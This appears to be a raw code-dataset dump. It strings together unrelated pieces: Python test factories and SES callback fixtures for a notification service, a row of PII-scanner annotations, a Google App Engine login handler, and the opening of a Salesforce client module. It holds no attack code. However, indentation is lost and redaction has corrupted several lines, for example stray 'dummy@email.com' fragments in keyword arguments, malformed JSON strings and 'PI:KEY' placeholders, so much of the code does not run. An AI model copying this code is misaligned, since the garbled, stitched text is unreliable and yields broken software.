def create_service_guest_list(service, email_address=None, mobile_number=None):
if email_address:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)
elif mobile_number:
guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)
else:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, 'dummy@email.com')
db.session.add(guest_list_user)
db.session.commit()
return guest_list_user
def create_complaint(service=None,
notification=None,
created_at=None):
if not service:
service = create_service()
if not notification:
template = create_template(service=service, template_type='email')
notification = create_notification(template=template)
complaint = Complaint(notification_id=notification.id,
service_id=service.id,
ses_feedback_id=str(uuid.uuid4()),
complaint_type='abuse',
complaint_date=datetime.utcnow(),
created_at=created_at if created_at else datetime.now()
)
db.session.add(complaint)
db.session.commit()
return complaint
def ses_complaint_callback_malformed_message_id():
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback_with_missing_complaint_type():
""""""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
""""""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback():
""""""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
""""""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_notification_callback():
return '{\n ""Type"" : ""Notification"",\n ""MessageId"" : ""ref1"",' \
'\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",' \
'\n ""Message"" : ""{\\""notificationType\\"":\\""Delivery\\"",' \
'\\""mail\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:25.909Z\\"",' \
'\\""source\\"":dummy@email.com"",' \
'\\""sourceArn\\"":\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\"",' \
'\\""sendingAccountId\\"":\\""123456789012\\"",' \
'\\""messageId\\"":\\""ref1\\"",' \
'\\""destination\\"":dummy@email.com""]},' \
'\\""delivery\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:26.567Z\\"",' \
'\\""processingTimeMillis\\"":658,' \
'\\""recipients\\"":dummy@email.com""],' \
'\\""smtpResponse\\"":\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\"",' \
'\\""reportingMTA\\"":\\""a6-238.smtp-out.eu-west-1.amazonses.com\\""}}"",' \
'\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\n ""SignatureVersion"" : ""1"",' \
'\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \
'PI:KEY' \
'PI:KEY' \
'PI:KEY"",' \
'\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \
'dd426d95ee9390147a5624348ee.pem"",' \
'\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \
'PI:KEY""\n}'
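def _decode_ses_callback_message(callback):
    """Minimal sketch (not part of the original fixtures): the SNS payloads
    built above are double-encoded, so a test unpacks the inner JSON from the
    'Message' field. Accepts either the dict fixtures or the string one."""
    import json  # local import; module-level imports are not visible here
    envelope = callback if isinstance(callback, dict) else json.loads(callback)
    return json.loads(envelope['Message'])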
def create_service_data_retention(
service,
notification_type='sms',
days_of_retention=3
):
data_retention = insert_service_data_retention(
service_id=service.id,
notification_type=notification_type,
days_of_retention=days_of_retention
)
return data_retention
def create_invited_user(service=None,
to_email_address=None):
if service is None:
service = create_service()
if to_email_address is None:
to_email_address = 'dummy@email.com'
from_user = service.users[0]
data = {
'service': service,
'email_address': to_email_address,
'from_user': from_user,
'permissions': 'send_messages,manage_service,manage_api_keys',
'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())]
}
invited_user = InvitedUser(**data)
save_invited_user(invited_user)
return invited_user
def create_template_folder(service, name='foo', parent=None):
tf = TemplateFolder(name=name, service=service, parent=parent)
db.session.add(tf)
db.session.commit()
return tf
def create_letter_branding(name='HM Government', filename='hm-government'):
test_domain_branding = LetterBranding(name=name,
filename=filename,
)
db.session.add(test_domain_branding)
db.session.commit()
return test_domain_branding
def set_up_usage_data(start_date):
year = int(start_date.strftime('%Y'))
one_week_earlier = start_date - timedelta(days=7)
two_days_later = start_date + timedelta(days=2)
one_week_later = start_date + timedelta(days=7)
one_month_later = start_date + timedelta(days=31)
# service with sms and letters:
service_1_sms_and_letter = create_service(
service_name='a - with sms and letter',
purchase_order_number=""service purchase order number"",
billing_contact_names=""service billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""service billing reference""
)
letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter')
sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms')
create_annual_billing(
service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year
)
org_1 = create_organisation(
name=""Org for {}"".format(service_1_sms_and_letter.name),
purchase_order_number=""org1 purchase order number"",
billing_contact_names=""org1 billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""org1 billing reference""
)
dao_add_service_to_organisation(
service=service_1_sms_and_letter,
organisation_id=org_1.id
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=1, rate=.35, postage='first')
create_ft_billing(bst_date=one_month_later, template=letter_template_1,
notifications_sent=4, billable_unit=2, rate=.45, postage='second')
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=2, rate=.45, postage='second')
# service with emails only:
service_with_emails = create_service(service_name='b - emails')
email_template = create_template(service=service_with_emails, template_type='email')
org_2 = create_organisation(
name='Org for {}'.format(service_with_emails.name),
)
dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)
create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)
# service with letters:
service_with_letters = create_service(service_name='c - letters only')
letter_template_3 = create_template(service=service_with_letters, template_type='letter')
org_for_service_with_letters = create_organisation(
name=""Org for {}"".format(service_with_letters.name),
purchase_order_number=""org3 purchase order number"",
billing_contact_names=""org3 billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""org3 billing reference""
)
dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)
create_ft_billing(bst_date=start_date, template=letter_template_3,
notifications_sent=2, billable_unit=3, rate=.50, postage='first')
create_ft_billing(bst_date=one_week_later, template=letter_template_3,
notifications_sent=8, billable_unit=5, rate=.65, postage='second')
create_ft_billing(bst_date=one_month_later, template=letter_template_3,
notifications_sent=12, billable_unit=5, rate=.65, postage='second')
# service with letters, without an organisation:
service_with_letters_without_org = create_service(service_name='d - service without org')
letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=8, billable_unit=4, rate=1.55, postage='europe')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=2, billable_unit=1, rate=.35, postage='second')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=1, billable_unit=1, rate=.50, postage='first')
# service with chargeable SMS, without an organisation
service_with_sms_without_org = create_service(
service_name='b - chargeable sms',
purchase_order_number=""sms purchase order number"",
billing_contact_names=""sms billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""sms billing reference""
)
sms_template = create_template(service=service_with_sms_without_org, template_type='sms')
create_annual_billing(
service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)
create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)
# service with SMS within free allowance
service_with_sms_within_allowance = create_service(
service_name='e - sms within allowance'
)
sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms')
create_annual_billing(
service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)
# dictionary with services and orgs to return
return {
""org_1"": org_1,
""service_1_sms_and_letter"": service_1_sms_and_letter,
""org_2"": org_2,
""service_with_emails"": service_with_emails,
""org_for_service_with_letters"": org_for_service_with_letters,
""service_with_letters"": service_with_letters,
""service_with_letters_without_org"": service_with_letters_without_org,
""service_with_sms_without_org"": service_with_sms_without_org,
""service_with_sms_within_allowance"": service_with_sms_within_allowance,
}
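# Illustrative sketch: a billing test seeds a financial year of usage data in
# one call and picks the fixtures it needs out of the returned dictionary.
def _example_usage_data():
    fixtures = set_up_usage_data(datetime(2019, 4, 1))
    return fixtures['service_1_sms_and_letter'], fixtures['org_1']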
def create_returned_letter(service=None, reported_at=None, notification_id=None):
if not service:
service = create_service(service_name='a - with sms and letter')
returned_letter = ReturnedLetter(
service_id=service.id,
reported_at=reported_at or datetime.utcnow(),
notification_id=notification_id or uuid.uuid4(),
created_at=datetime.utcnow(),
)
db.session.add(returned_letter)
db.session.commit()
return returned_letter
def create_service_contact_list(
service=None,
original_file_name='EmergencyContactList.xls',
row_count=100,
template_type='email',
created_by_id=None,
archived=False,
):
if not service:
service = create_service(service_name='service for contact list', user=create_user())
contact_list = ServiceContactList(
service_id=service.id,
original_file_name=original_file_name,
row_count=row_count,
template_type=template_type,
created_by_id=created_by_id or service.users[0].id,
created_at=datetime.utcnow(),
archived=archived,
)
db.session.add(contact_list)
db.session.commit()
return contact_list
def create_broadcast_message(
template=None,
*,
service=None, # only used if template is not provided
created_by=None,
personalisation=None,
content=None,
status=BroadcastStatusType.DRAFT,
starts_at=None,
finishes_at=None,
areas=None,
stubbed=False
):
if template:
service = template.service
template_id = template.id
template_version = template.version
personalisation = personalisation or {}
content = template._as_utils_template_with_personalisation(
personalisation
).content_with_placeholders_filled_in
elif content:
template_id = None
template_version = None
personalisation = None
content = content
else:
pytest.fail('Provide template or content')
broadcast_message = BroadcastMessage(
service_id=service.id,
template_id=template_id,
template_version=template_version,
personalisation=personalisation,
status=status,
starts_at=starts_at,
finishes_at=finishes_at,
created_by_id=created_by.id if created_by else service.created_by_id,
areas=areas or {'areas': [], 'simple_polygons': []},
content=content,
stubbed=stubbed
)
db.session.add(broadcast_message)
db.session.commit()
return broadcast_message
def create_broadcast_event(
broadcast_message,
sent_at=None,
message_type='alert',
transmitted_content=None,
transmitted_areas=None,
transmitted_sender=None,
transmitted_starts_at=None,
transmitted_finishes_at=None,
):
b_e = BroadcastEvent(
service=broadcast_message.service,
broadcast_message=broadcast_message,
sent_at=sent_at or datetime.utcnow(),
message_type=message_type,
transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'},
transmitted_areas=transmitted_areas or broadcast_message.areas,
transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk',
transmitted_starts_at=transmitted_starts_at,
transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),
)
db.session.add(b_e)
db.session.commit()
return b_e
def create_broadcast_provider_message(
broadcast_event,
provider,
status='sending'
):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=status,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
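# Illustrative sketch: per the branch above, only Vodafone provider messages
# get a BroadcastProviderMessageNumber row; other providers do not.
def _example_vodafone_provider_message(broadcast_event):
    return create_broadcast_provider_message(
        broadcast_event, BroadcastProvider.VODAFONE)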
def create_webauthn_credential(
user,
name='my key',
*,
credential_data='ABC123',
registration_response='DEF456',
):
webauthn_credential = WebauthnCredential(
user=user,
name=name,
credential_data=credential_data,
registration_response=registration_response
)
db.session.add(webauthn_credential)
db.session.commit()
return webauthn_credential
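# Illustrative sketch: the factories in this module compose into small object
# graphs, e.g. a service with a template and a live API key for an
# end-to-end test. A database session/app context is assumed.
def _example_service_graph():
    service = create_service(service_name='example service')
    template = create_template(service=service, template_type='sms')
    api_key = create_api_key(service, key_type=KEY_TYPE_NORMAL)
    return service, template, api_key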
",41713,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'""], ['URL', ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'""], ['DATE_TIME', 'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', ""post_class='second""], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', ""provider='mmg""], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', '2016-03-14T12:35:26.665Z"",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 
'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], 
['URL', 'letter.id'], ['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', '2.id'], ['URL', 'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']]"
100,"# -*- coding: utf-8 -*-
import os
import uuid
import datetime
from google.appengine.ext import webapp
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.api import mail
from google.appengine.ext.webapp import template
from django.utils import simplejson as json
from google.appengine.api import urlfetch
import urllib
import conf
import app.FlyingClub
import app.CoreHandler
from app.models import Comment, Crew
class AuthHandler(webapp.RequestHandler):
###################################################################################################
## Get Actions
###################################################################################################
def get(self, section=None, page=None):
#sessID = self.do_cookie_check()
section = 'auth'
template_vars = {}
App = app.FlyingClub.FlyingClub(section, page)
template_vars['app'] = App
#tvars['appo'] = Appo
#tvars['conf'] = conf
#tvars['user'] = None
#template_vars['crewID'] = crewID
#f 'sessIdent' in self.request.cookies:
#sessIdent = self.request.cookies['sessIdent']
#lse:
# sessIdent = None
## Setup Section and Page
#if section == None:
#section = ""index""
#template_vars['section'] = section
#template_vars['page'] = page
## Get Comments
q = db.GqlQuery(""SELECT * FROM Comment "" +
""WHERE section = :1 "" +
""ORDER BY dated DESC"",
section)
results = q.fetch(50)
#template_vars['comments'] = results
## Application Object
#template_vars['page_title'] = Appo.title("/%s/" % section)
## Setup User + Aauth
#user = users.get_current_user()
#if not user:
# template_vars['user'] = None
# template_vars['login_url'] = users.create_login_url("/set_session/")
#else:
# template_vars['user'] = user
# template_vars['logout_url'] = users.create_logout_url("/subscribe/")
## Sign In Section
#if section == 'ssignin' :
# if sessID:
# self.redirect(""/profile/"")
# return
#template_vars['page_title'] = 'Sign In with OpenId'
#if section == 'sdo_logout':
# cook_str = 'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;' % ''
# self.response.headers.add_header( 'Set-Cookie',
# cook_str
# )
# self.redirect(""/"")
# return
#if section == 'sprofile':
# if not sessID:
# self.redirect(""/signin/"")
# return
#template_vars['welcome'] = True if self.request.get("welcome") == '1' else False
#template_vars['page_title'] = 'My Profile'
main_template = '%s.html' % (section)
path = '/%s/' % (section)
#template_vars['path'] = path
template_path = os.path.join(os.path.dirname(__file__), '../templates/pages/%s' % main_template)
self.response.out.write(template.render(template_path, template_vars))
###################################################################################################
## Post Actions
###################################################################################################
def post(self, page=None):
if page == 'rpx':
token = self.request.get('token')
url = 'https://rpxnow.com/api/v2/auth_info'
args = {
'format': 'json',
'apiKey': conf.RPX_API_KEY,
'token': token
}
r = urlfetch.fetch( url=url,
payload=urllib.urlencode(args),
method=urlfetch.POST,
headers={'Content-Type':'application/x-www-form-urlencoded'}
)
data = json.loads(r.content)
if data['stat'] == 'ok':
welcome = 0
unique_identifier = data['profile']['identifier']
q = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier)
crew = q.get()
if not crew:
crew = Crew(ident=unique_identifier)
crew.name = data['profile']['preferredUsername']
if data['profile'].has_key('email'):
crew.email = data['profile']['email']
crew.put()
welcome = 1
subject = ""New Login: %s"" % crew.name
body = ""New login on schedule""
else:
subject = ""Return Login: %s"" % crew.name
body = ""New login on schedule""
sessID = str(crew.key())
cook_str = 'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;' % sessID  # use the session key built above; db.Model has no instance .id()
self.response.headers.add_header( 'Set-Cookie',
cook_str
)
mail.send_mail( sender = conf.EMAIL,
to = ""Dev dummy@email.com"",
subject = subject,
body = body
)
self.redirect(""/profile/?welcome=%s"" % welcome)
return
else:
print page  # `section` is not defined in post(); log the unexpected target
#self.redirect("/")
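# Minimal sketch (not in the original file) of how this handler is typically
# wired into a GAE webapp application; the URL pattern is illustrative.
# application = webapp.WSGIApplication(
#     [(r'/auth/?([^/]*)/?([^/]*)', AuthHandler)], debug=True)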
",4533,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://rpxnow.com/api/v2/auth_info'""], ['PERSON', ""template_vars['app""], ['URL', 'users.cr'], ['URL', 'users.cr'], ['PERSON', '#'], ['DATE_TIME', '23:59:59 GMT'], ['URL', 'r.co'], ['PERSON', ""data['profile']['identifier""], ['NRP', 'sessID'], ['DATE_TIME', '31-Dec-2020'], ['DATE_TIME', '23:59:59 GMT'], ['PERSON', 'EMAIL'], ['DATE_TIME', '31-Dec-1980'], ['URL', 'app.Co'], ['URL', 'app.mo'], ['URL', 'webapp.Re'], ['URL', 'self.do'], ['URL', 'self.request.co'], ['URL', 'self.request.co'], ['URL', 'db.Gq'], ['URL', 'users.ge'], ['URL', 'self.red'], ['URL', 'self.response.headers.ad'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'self.request.ge'], ['URL', 's.ht'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.request.ge'], ['URL', 'db.Gq'], ['URL', 'q.ge'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.ke'], ['URL', 'crew.id'], ['URL', 'self.response.headers.ad'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'self.red'], ['URL', 'self.red']]"
101,"""""""Core classes and exceptions for Simple-Salesforce""""""
# has to be defined prior to login import
DEFAULT_API_VERSION = '29.0'
import requests
import json
try:
from urlparse import urlparse
except ImportError:
# Python 3+
from urllib.parse import urlparse
from simple_salesforce.login import SalesforceLogin
from simple_salesforce.util import date_to_iso8601, SalesforceError
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class Salesforce(object):
""""""Salesforce Instance
An instance of Salesforce is a handy way to wrap a Salesforce session
